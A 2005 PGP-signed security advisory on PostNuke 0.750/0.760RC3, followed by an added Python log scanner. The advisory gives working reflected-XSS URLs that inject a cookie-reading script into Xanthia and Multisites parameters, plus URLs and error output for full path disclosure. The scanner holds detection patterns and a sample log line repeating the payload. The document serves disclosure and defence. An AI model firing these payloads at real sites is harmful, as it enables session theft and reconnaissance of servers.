-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke XSS and Full path disclosure 0.760RC3=>x cXIb8O3.7]

Author: Maksymilian Arciemowicz ( cXIb8O3 )
Date: 15.3.2005
from SECURITYREASON.COM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.750) and (0.760RC3)

PostNuke is an open source, open development content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke
Or at the Community Forums located at: http://forums.postnuke.com/

- --- 1. Cross Site Scripting ---

1.0

http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

etc.

1.1 If PHP error messages are displayed and register_globals = On

http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=

SUICIDE

or for 0.750

http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=

SUICIDE

- --- 2. Full path disclosure ---

2.0

http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php

Error message :
- ---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8

Fatal error: main() [function.require]: Failed opening required '/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in /www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line 8
- ---------------

2.1

http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php

Error message :
- ---------------
Fatal error: Call to undefined function pnModGetVar() in /www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on line 48
- ---------------

2.2

http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php

Error message :
- ---------------
Fatal error: Call to undefined function pnSecAddSchema() in /www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on line 48
- ---------------

2.3

http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php

or for 0.760RC3

http://[HOST]/[DIR]/modules/Multisites/installation/config.php

Error message :
- ---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No such file or directory in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2

Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for inclusion (include_path='.:') in /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2
- ---------------

2.4

http://[HOST]/[DIR]/xmlrpc.php

Error message :
- ---------------
Fatal error: Cannot redeclare xmlrpc_decode() in /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line 1068
- ---------------

- --- 3. How to fix ---

PNSA 2005-2 Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html
SHA1: 6e76d92124c833618d02dfdb87d699374120967d
MD5: a007e741be11389a986b1d8928a6c0e5
Size: 160550 Bytes

or CVS

- --- 4. Greets ---

sp3x

- --- 5.Contact ---

Author: Maksymilian Arciemowicz
Email: max [at] jestsuper [dot] pl
SECURITYREASON.COM TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCjuwZznmvyJCR4zQRAn1KAJ9tOTHbV/fD1SfDdOIWgC3k85hzyQCfW4f6
gJkmI7Sn6EGfgvz580tJ7Ks=
=7iQn
-----END PGP SIGNATURE-----
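
Added example (not part of the original advisory or of PostNuke): a log check that flags requests matching sections 1.0-1.1 (markup in skin, paletteid or serverName) and sections 2.0-2.3 (include files requested directly); 2.4 (xmlrpc.php) is not covered. The Combined Log Format, the /pn/ directory, the sample log lines and the set of characters treated as markup are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names from sections 1.0/1.1 of the advisory.
XSS_PARAMS = {
    "/modules/Xanthia/pnhtml/demo.php": {"skin", "paletteid"},
    "/modules/Multisites/installation/config.php": {"serverName"},
    "/modules/NS-Multisites/installation/config.php": {"serverName"},
}
# Files from sections 2.0-2.3 whose direct request produced the path-revealing errors.
DIRECT_ACCESS = re.compile(
    r"/modules/(?:Xanthia/(?:pndocs/themes/theme|pnclasses/Xanthia)"
    r"|Blocks/pnblocks/(?:user|thelang|text|html|menu|finclude|button)"
    r"|(?:NS-)?Multisites/installation/config)\.php$"
)
# Assumption: none of these characters belongs in a skin, palette or server name.
MARKUP = re.compile(r"[<>\"']")
# Request field of a Combined Log Format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(line):
    """Return 'xss-probe', 'direct-include-access' or None for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    for suffix, params in XSS_PARAMS.items():
        if url.path.endswith(suffix):
            # parse_qsl percent-decodes, so %3Cscript%3E is matched as <script>
            for name, value in parse_qsl(url.query, keep_blank_values=True):
                if name in params and MARKUP.search(value):
                    return "xss-probe"
    return "direct-include-access" if DIRECT_ACCESS.search(url.path) else None


def scan(lines):
    """Return (line number, label) for every flagged line."""
    return [(i, label) for i, line in enumerate(lines, 1) if (label := classify(line))]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Mar/2005:10:00:01 +0100] "GET /pn/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Mar/2005:10:00:07 +0100] "GET /pn/modules/Xanthia/pnhtml/demo.php'
    '?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 900',
    '192.0.2.44 - - [15/Mar/2005:10:00:09 +0100] "GET /pn/modules/Blocks/pnblocks/button.php HTTP/1.1" 200 210',
    '192.0.2.10 - - [15/Mar/2005:10:00:12 +0100] "GET /pn/modules/Xanthia/pnhtml/demo.php?skin=blue HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A request to config.php is reported as xss-probe when serverName carries markup and as direct-include-access otherwise, since section 2.3 lists the same file.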